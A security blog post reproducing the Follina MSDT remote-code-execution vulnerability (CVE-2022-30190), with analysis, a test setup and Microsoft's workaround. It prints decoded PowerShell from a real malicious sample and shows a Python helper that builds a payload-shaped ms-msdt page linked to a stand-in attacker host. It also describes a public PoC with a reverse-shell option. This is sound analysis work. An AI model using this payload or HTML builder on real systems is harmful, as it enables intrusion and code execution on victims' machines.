Reproduction of CVE-2022-30190 Zero-day Vulnerability “Follina”

Huriye Özdemir
Jun 1, 2022

On Monday, May 30, 2022, Microsoft issued CVE-2022-30190, a zero-day remote code execution (RCE) vulnerability in the Microsoft Support Diagnostic Tool (MSDT).

I would like to share the notes I took while testing this critical vulnerability.

First, Nao_sec spotted a malicious Office document that had been submitted to VirusTotal from Belarus.

The malicious document loads HTML from a remote server through an external link in the document package; that HTML then navigates to an “ms-msdt” URL, which launches msdt.exe and makes it run attacker-supplied PowerShell on the target machine. No macro is involved and there is nothing for the victim to enable: opening the malicious Office document is enough for code execution, and in the RTF form of the document even previewing it suffices.

MSDT is a diagnostic tool that collects information and sends it to Microsoft for analysis when users encounter certain issues. It is reachable from other applications through the ms-msdt: URL protocol handler registered under HKEY_CLASSES_ROOT\ms-msdt, which is why the workaround at the end of this post targets that key.

Who is Vulnerable?

https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/

Before testing, make sure you are running a vulnerable Office build.

I had Office 365 Current Channel version 2205 (build 15225.20204), so I downgraded Office to Semi-Annual Enterprise Channel version 2108 (build 14326.20962). You can see the update history for Office 365 here.

I used the following commands to downgrade (thanks to this Reddit entry):

cd %programfiles%\Common Files\Microsoft Shared\ClickToRun
rem switch the update channel to Semi-Annual Enterprise Channel (Broad)
OfficeC2RClient.exe /changesetting Channel=Broad
OfficeC2RClient.exe /update user
rem roll back to the specific build on that channel
OfficeC2RClient.exe /update user updatetoversion=14326.20962
OfficeC2RClient.exe /update user

Technical Analysis

The Office document was flagged as malicious by 37 security vendors on VirusTotal (as of 01.06.2022). You can also see the details and a quick behavior analysis of the document here.

I downloaded the sample document from app.any.run, which also shows a dynamic analysis of the malware.

A .docx file is a ZIP container: when you unzip it, you will see all the components of the Office document.

Inside the word/_rels/document.xml.rels file there is an oleObject relationship with TargetMode="External" whose target is hxxps[:]//www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html! (no longer online; note the trailing “!”). Word follows this link when the document is opened and fetches the HTML from the remote server; that HTML is what carries the payload that ends up running PowerShell on the target Windows machine.

In the dynamic analysis on app.any.run you can see that the HTML content starts with a large block of “A” characters inside comments. This padding pushes the file past 4096 bytes; without it the payload is not processed, the same size requirement the CVE-2021-40444 exploit chain had to satisfy. For more information → https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/

At the end of the script, a code block sets window.location.href to an ms-msdt: URL. The URL launches the PCWDiagnostic troubleshooter (/id PCWDiagnostic /skip force) and passes an IT_BrowseForFile parameter containing Base64-encoded data wrapped in $(Invoke-Expression(...)), which msdt.exe evaluates as PowerShell.

When the Base64 is decoded, we can see the PowerShell commands:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

This script does the following (the breakdown below is taken from the Huntress blog):

Starts hidden windows to:

  • Kill msdt.exe if it is running
  • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
  • Store this Base64 encoded CAB file as 1.t
  • Decode the Base64 encoded CAB file to be saved as 1.c
  • Expand the 1.c CAB file into the current directory, and finally:
  • Execute rgb.exe (presumably compressed inside the 1.c CAB file)

As you can see, an attacker can execute any command that serves their purposes and gain initial access without macros, needing nothing more than a single click from the victim to open the document.
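To make the two analysis steps above concrete, the external relationship in the document package and the ms-msdt: URL carrying Base64 PowerShell in the fetched HTML, here is an added Python triage helper. It is example code written for this post, not the sample's, Nao_sec's or John Hammond's code. It builds a constructed docx-like ZIP and a constructed HTML page in memory so it runs offline; the URL attacker.example/payload.html!, the calc command and the Base64 blob are placeholders, not the real sample's indicators, and the HTML is only shaped like the public sample's. It lists external relationships from word/_rels/document.xml.rels, extracts and decodes the Base64 passed to FromBase64String inside the ms-msdt: URL, and checks the 4096-byte padding threshold.

```python
"""Added triage helper for Follina-style documents (example code for this
post; not the sample's, Nao_sec's or John Hammond's code).

It builds a constructed docx-like ZIP and a constructed HTML payload page in
memory so that it runs offline, then performs the two checks from the analysis:
  1. external relationships in word/_rels/document.xml.rels, the hook the
     sample used to fetch remote HTML;
  2. the ms-msdt: URL in that HTML, with the Base64 passed to
     FromBase64String(...) decoded back to PowerShell, plus the 4096-byte
     padding check.
The URL, command and Base64 below are placeholders, not real indicators.
"""
import base64
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
FAKE_PAYLOAD_URL = "http://attacker.example/payload.html!"  # constructed; keeps the trailing '!'


def build_sample_docx() -> bytes:
    """Minimal docx-like ZIP with one external oleObject link (constructed)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OLE_TYPE}" Target="{FAKE_PAYLOAD_URL}" '
        'TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Return (relationship type, target) for every relationship in
    word/_rels/document.xml.rels marked TargetMode="External". A normal
    document rarely has an external oleObject target; one ending in
    '.html!' is the Follina pattern."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/document.xml.rels" not in zf.namelist():
            return found
        root = ET.fromstring(zf.read("word/_rels/document.xml.rels"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("TargetMode") == "External":
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((rtype, rel.get("Target", "")))
    return found


def build_sample_html(powershell: str) -> str:
    """Constructed HTML shaped like the public sample: a comment of 'A's to
    pass 4096 bytes, then a script navigating to an ms-msdt: URL whose
    IT_BrowseForFile parameter smuggles Base64 PowerShell via Invoke-Expression."""
    b64 = base64.b64encode(powershell.encode()).decode()
    url = (
        "ms-msdt:/id PCWDiagnostic /skip force /param "
        '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
        "IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
        "'[System.Text.Encoding]::UTF8.GetString([System.Convert]::"
        f"FromBase64String(\\\"{b64}\\\"))'))))"
        'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"'
    )
    return (
        "<!doctype html><html><body>\n"
        f"<!--{'A' * 4200}-->\n"
        f'<script>window.location.href = "{url}";</script>\n'
        "</body></html>"
    )


MSDT_ID_RE = re.compile(r"ms-msdt:/id\s+(\w+)")
B64_ARG_RE = re.compile(r"FromBase64String\(\\?[\"']([A-Za-z0-9+/=]+)\\?[\"']\)")


def triage_html(html: str) -> dict:
    """Report which troubleshooter an ms-msdt: URL invokes, the decoded
    PowerShell in every FromBase64String(...) argument, and whether the page
    clears the 4096-byte threshold the padding exists for."""
    match = MSDT_ID_RE.search(html)
    decoded = []
    for blob in B64_ARG_RE.findall(html):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return {
        "diagnostic_id": match.group(1) if match else None,
        "decoded": decoded,
        "over_4096": len(html.encode()) > 4096,
    }


if __name__ == "__main__":
    for rtype, target in external_relationships(build_sample_docx()):
        print(f"external {rtype} -> {target}")
    print(triage_html(build_sample_html("Start-Process calc.exe")))
```

Point external_relationships at a real suspicious .docx (read the file's bytes) and triage_html at the HTML you fetched in a sandbox; an external oleObject target and a decoded Invoke-Expression string together are the Follina signature, and a page under 4096 bytes is a hint that the sample was truncated or is a non-working variant.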

PoC

You can use the following proofs of concept published by security researchers.

https://gist.github.com/tothi/66290a42896a97920055e50128c9f040

I chose John Hammond’s PoC for my test.

When you run the Python script, it creates a maldoc and serves an HTML payload. I transferred follina.doc to the Windows machine (in real life this would be done via social engineering). When I opened the file, a calculator started along with the Windows troubleshooter (the script executes the calc command by default). You can also change the command with the -c parameter.

When you use the -r parameter with a port number, the script serves a reverse shell payload instead, and you get a reverse shell from the target machine.

If the Preview Pane is enabled in Windows Explorer, merely selecting the document is enough to trigger the commands without opening it (zero click); this preview-pane trigger was demonstrated with the RTF form of the document.

Workaround Solutions from Microsoft

Microsoft is still working on a permanent fix (one later shipped in the June 14, 2022 Windows updates) and has published steps for disabling the MSDT URL protocol handler via Command Prompt. Deleting the registry key does not remove msdt.exe; it only stops ms-msdt: links from being handed to it, which is the step this exploit chain depends on.

  1. Run Command Prompt as Administrator.
  2. Back up the registry key: reg export HKEY_CLASSES_ROOT\ms-msdt filename (filename is the .reg file the backup is written to).
  3. Delete the key: reg delete HKEY_CLASSES_ROOT\ms-msdt /f

How to undo the workaround

  1. Run Command Prompt as Administrator.
  2. Restore the registry key from the backup: reg import filename

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/


Huriye Özdemir

Senior Cybersecurity Consultant | Artist — Instagram: @art.lady.bug